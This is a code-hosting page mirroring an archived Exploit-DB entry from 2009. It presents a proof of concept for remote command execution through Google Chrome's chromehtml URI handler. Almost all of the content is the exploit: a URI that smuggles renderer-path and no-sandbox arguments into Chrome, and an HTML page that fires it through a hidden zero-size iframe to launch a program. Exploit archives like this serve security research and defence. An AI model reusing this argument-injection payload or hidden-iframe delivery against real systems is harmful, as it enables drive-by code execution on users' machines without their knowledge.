bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/7935.html
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

16 lines
No EOL
449 B
HTML
Raw Blame History

Try this:
chromehtml:"%20--renderer-path="calc"%20--no-sandbox
Disabling sandbox does matter :)
Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...
Full PoC:
<html><head><title>Chrome URI Handler Remote Command Execution PoC</title></head>
<body>
<h3>This is a test</h3>
<iframe src='chromehtml:"%20--renderer-path="calc"%20--no-sandbox' width=0 height=0></iframe>
</body></html>
# milw0rm.com [2009-01-30]
Reference in a new issue View git blame Copy permalink